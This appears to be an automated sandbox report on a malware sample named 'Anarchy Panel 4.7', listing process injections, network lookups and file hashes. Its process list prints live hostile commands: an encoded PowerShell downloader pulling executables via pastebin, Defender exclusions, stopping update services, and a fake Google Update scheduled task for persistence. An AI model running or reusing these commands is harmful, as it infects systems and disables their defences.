PID 384 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4164 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4164 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4860 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe C:\Windows\System32\dialer.exe
PID 5040 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4456 wrote to memory of 588 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\winlogon.exe
PID 4456 wrote to memory of 676 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\lsass.exe
PID 4456 wrote to memory of 952 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4456 wrote to memory of 316 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\dwm.exe
PID 4456 wrote to memory of 436 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 4456 wrote to memory of 752 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 5040 wrote to memory of 784 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 784 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4456 wrote to memory of 1064 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 4456 wrote to memory of 1092 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 5040 wrote to memory of 3524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 3524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4456 wrote to memory of 1104 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 4456 wrote to memory of 1180 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe"

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe"

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe"

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 428 -p 588 -ip 588

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 588 -s 764

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 316 -ip 316

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 316 -s 3892

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 528 -p 316 -ip 316

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/4632-133-0x0000000002D60000-0x0000000002D96000-memory.dmp

memory/4632-134-0x0000000074980000-0x0000000075130000-memory.dmp

memory/4632-135-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-136-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-137-0x0000000005940000-0x0000000005F68000-memory.dmp

memory/4632-138-0x00000000056B0000-0x00000000056D2000-memory.dmp

memory/4632-139-0x0000000005FE0000-0x0000000006046000-memory.dmp

memory/4632-140-0x0000000006050000-0x00000000060B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3cy31vnb.nyd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4632-150-0x0000000006680000-0x000000000669E000-memory.dmp

memory/4632-151-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-152-0x000000007FBB0000-0x000000007FBC0000-memory.dmp

memory/4632-153-0x0000000007880000-0x00000000078B2000-memory.dmp

memory/4632-154-0x00000000707A0000-0x00000000707EC000-memory.dmp

memory/4632-164-0x0000000006C50000-0x0000000006C6E000-memory.dmp

memory/4632-165-0x0000000007FF0000-0x000000000866A000-memory.dmp

memory/4632-166-0x00000000079B0000-0x00000000079CA000-memory.dmp

memory/4632-167-0x0000000007A00000-0x0000000007A0A000-memory.dmp

memory/4632-168-0x0000000007C50000-0x0000000007CE6000-memory.dmp

memory/4632-169-0x0000000074980000-0x0000000075130000-memory.dmp

memory/4632-170-0x0000000007BD0000-0x0000000007BDE000-memory.dmp

memory/4632-171-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-172-0x0000000007C20000-0x0000000007C3A000-memory.dmp

memory/4632-173-0x0000000007C10000-0x0000000007C18000-memory.dmp

memory/4632-174-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-175-0x0000000007EC0000-0x0000000007EE2000-memory.dmp

memory/4632-176-0x0000000008C20000-0x00000000091C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

memory/4632-189-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe

MD5 c4b8578d2354c38613669b1c82a08ccb
SHA1 f6b0353977350e42d6a4f09f887c41b51c1adf6e
SHA256 3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2
SHA512 903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe

MD5 c4b8578d2354c38613669b1c82a08ccb
SHA1 f6b0353977350e42d6a4f09f887c41b51c1adf6e
SHA256 3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2
SHA512 903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe

MD5 c3ec8ce62adc05301e89a5db1694d79d
SHA1 033a64fd7f407d319dd660e9f9ba49851b9229a1
SHA256 97cc46d4f3ed56b872bd8cd8a7f35a6a3128b898bb8a5b03c36c4f8d29f0f9cf
SHA512 cebaa16485bfd01081b727375a458f9a817a5295a157adffbf5ec4f76697caa8bc6d8f0de5909dab98f6948d085f82ebbab479bfb3d3c2a285b3f422139baf6d

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe

MD5 c3ec8ce62adc05301e89a5db1694d79d
SHA1 033a64fd7f407d319dd660e9f9ba49851b9229a1
SHA256 97cc46d4f3ed56b872bd8cd8a7f35a6a3128b898bb8a5b03c36c4f8d29f0f9cf
SHA512 cebaa16485bfd01081b727375a458f9a817a5295a157adffbf5ec4f76697caa8bc6d8f0de5909dab98f6948d085f82ebbab479bfb3d3c2a285b3f422139baf6d

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe

MD5 c3ec8ce62adc05301e89a5db1694d79d
SHA1 033a64fd7f407d319dd660e9f9ba49851b9229a1
SHA256 97cc46d4f3ed56b872bd8cd8a7f35a6a3128b898bb8a5b03c36c4f8d29f0f9cf
SHA512 cebaa16485bfd01081b727375a458f9a817a5295a157adffbf5ec4f76697caa8bc6d8f0de5909dab98f6948d085f82ebbab479bfb3d3c2a285b3f422139baf6d

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe

MD5 27543547fa480422e56e0b4cdbb09488
SHA1 35f701bc2c43a308098251d9d413e64e52176fc2
SHA256 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664
SHA512 a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe

MD5 27543547fa480422e56e0b4cdbb09488
SHA1 35f701bc2c43a308098251d9d413e64e52176fc2
SHA256 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664
SHA512 a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe

MD5 27543547fa480422e56e0b4cdbb09488
SHA1 35f701bc2c43a308098251d9d413e64e52176fc2
SHA256 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664
SHA512 a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

memory/4632-215-0x0000000074980000-0x0000000075130000-memory.dmp

memory/448-216-0x0000000002190000-0x0000000002197000-memory.dmp

memory/448-217-0x0000000002230000-0x0000000002630000-memory.dmp

memory/448-218-0x0000000002230000-0x0000000002630000-memory.dmp

memory/2688-219-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/2688-220-0x0000023FA6610000-0x0000023FA6620000-memory.dmp

memory/448-221-0x0000000002230000-0x0000000002630000-memory.dmp

memory/2688-222-0x0000023FA6610000-0x0000023FA6620000-memory.dmp

memory/448-223-0x0000000002230000-0x0000000002630000-memory.dmp

memory/2688-233-0x0000023FA87D0000-0x0000023FA87F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bf5ac66a6a0b2e5a158d989669ea5202
SHA1 56eaeb9500ac19e9006c5f5cd96f6ad648e92612
SHA256 70a48a9f41e18cb879549fc403fe7080aab5213506fd00bbd0b34ea3f68ac408
SHA512 9732bd97c4a2984bed99b1dcb46c685eca1bcc5c88c92f7ba39998f468e00240ad3e8f65f11f5e477a2472bef0ab1080804e227c4dc177d36744b5e6a618d3e1

memory/2688-235-0x0000023FA6610000-0x0000023FA6620000-memory.dmp

memory/2688-238-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/4456-241-0x00007FFC4A430000-0x00007FFC4A625000-memory.dmp

memory/4456-242-0x00007FFC485C0000-0x00007FFC4867E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2712-244-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/2712-245-0x00000227EC730000-0x00000227EC740000-memory.dmp

memory/2712-246-0x00000227EC730000-0x00000227EC740000-memory.dmp

memory/588-256-0x000001EC30030000-0x000001EC30057000-memory.dmp

memory/676-257-0x00000248341B0000-0x00000248341D7000-memory.dmp

memory/588-262-0x00007FFC4A4CF000-0x00007FFC4A4D0000-memory.dmp

memory/588-259-0x00007FFC4A4CD000-0x00007FFC4A4CE000-memory.dmp

memory/588-252-0x000001EC30000000-0x000001EC30021000-memory.dmp

memory/316-265-0x00000214404D0000-0x00000214404F7000-memory.dmp

memory/952-271-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/436-276-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/436-274-0x00000236C7110000-0x00000236C7137000-memory.dmp

memory/676-273-0x00000248341B0000-0x00000248341D7000-memory.dmp

memory/676-275-0x00007FFC4A4CD000-0x00007FFC4A4CE000-memory.dmp

memory/4860-270-0x00007FF6D2890000-0x00007FF6D2E5C000-memory.dmp

memory/676-280-0x00007FFC4A4CC000-0x00007FFC4A4CD000-memory.dmp

memory/952-281-0x00000179CE9E0000-0x00000179CEA07000-memory.dmp

memory/436-283-0x00000236C7110000-0x00000236C7137000-memory.dmp

memory/752-285-0x00000234621D0000-0x00000234621F7000-memory.dmp

memory/316-282-0x00000214404D0000-0x00000214404F7000-memory.dmp

memory/872-278-0x0000013EA7F90000-0x0000013EA7F93000-memory.dmp

memory/676-277-0x00007FFC4A4CF000-0x00007FFC4A4D0000-memory.dmp

memory/952-264-0x00000179CE9E0000-0x00000179CEA07000-memory.dmp

memory/676-260-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/448-286-0x0000000002230000-0x0000000002630000-memory.dmp

memory/752-287-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/752-288-0x00000234621D0000-0x00000234621F7000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a7ce8cefc3f798abe5abd683d0ef26dd
SHA1 b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA256 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512 c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

memory/1064-293-0x000001E3E2590000-0x000001E3E25B7000-memory.dmp

memory/1064-295-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/1092-297-0x0000022C03060000-0x0000022C03087000-memory.dmp

memory/1092-299-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/1104-303-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/1104-301-0x0000014BD96C0000-0x0000014BD96E7000-memory.dmp

memory/2712-305-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/2712-306-0x00000227EC730000-0x00000227EC740000-memory.dmp

memory/588-308-0x000001EC30030000-0x000001EC30057000-memory.dmp

memory/316-315-0x00000214404D0000-0x00000214404F7000-memory.dmp

memory/448-319-0x0000000002230000-0x0000000002630000-memory.dmp

memory/316-314-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/4456-311-0x00007FF77D520000-0x00007FF77D549000-memory.dmp

memory/448-310-0x00000000030C0000-0x00000000030F6000-memory.dmp

memory/1180-321-0x00000220F8940000-0x00000220F8967000-memory.dmp

memory/2712-323-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/1180-326-0x00000220F8940000-0x00000220F8967000-memory.dmp

memory/1180-325-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/752-328-0x00000234621D0000-0x00000234621F7000-memory.dmp

memory/1064-329-0x000001E3E2590000-0x000001E3E25B7000-memory.dmp

memory/1092-330-0x0000022C03060000-0x0000022C03087000-memory.dmp

memory/1104-331-0x0000014BD96C0000-0x0000014BD96E7000-memory.dmp

memory/1180-332-0x00000220F8940000-0x00000220F8967000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1565s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1769s

Max time network

1165s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 45.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1162s

Max time network

1168s

Command Line

